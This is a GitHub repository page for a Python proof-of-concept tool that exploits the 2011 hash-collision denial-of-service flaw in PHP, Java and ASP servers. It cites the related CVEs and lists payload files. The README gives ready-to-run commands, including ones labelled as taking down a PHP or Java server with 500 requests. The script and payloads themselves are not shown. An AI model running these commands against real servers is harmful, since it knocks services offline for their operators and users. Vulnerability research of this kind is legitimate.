GitHub - firefart/HashCollision-DOS-POC: Proof of Concept for the PHP and JAVA Hashcollision Denial of service attack

firefart / HashCollision-DOS-POC Public

Notifications You must be signed in to change notification settings
Fork 26
Star 98

Proof of Concept for the PHP and JAVA Hashcollision Denial of service attack

98 stars 26 forks Branches Tags Activity

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 30 Commits
HashtablePOC.py		HashtablePOC.py
README		README
payloadASP.txt		payloadASP.txt
payloadJAVA.txt		payloadJAVA.txt
payloadPHP.txt		payloadPHP.txt

Repository files navigation

This script was written by Christian Mehlmauer <FireFart@gmail.com>
https://twitter.com/#!/_FireFart_

Sourcecode online at:
https://github.com/FireFart/HashCollision-DOS-POC

Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision

http://www.ocert.org/advisories/ocert-2011-003.html
CVE:
    Apache Geronimo:    CVE-2011-5034
    Oracle Glassfish:   CVE-2011-5035
    PHP:                CVE-2011-4885
    Apache Tomcat:      CVE-2011-4858

requires Python 2.7

Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP

-) Take down a PHP server(make 500 requests without waiting for a response):
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP

-) Take down a JAVA server(tested with Tomcat and Glassfish; make 500 requests without waiting for a response, maximum POST data size 2MB):
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2

Changelog:
v6.0: Added Javapayloadgenerator
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release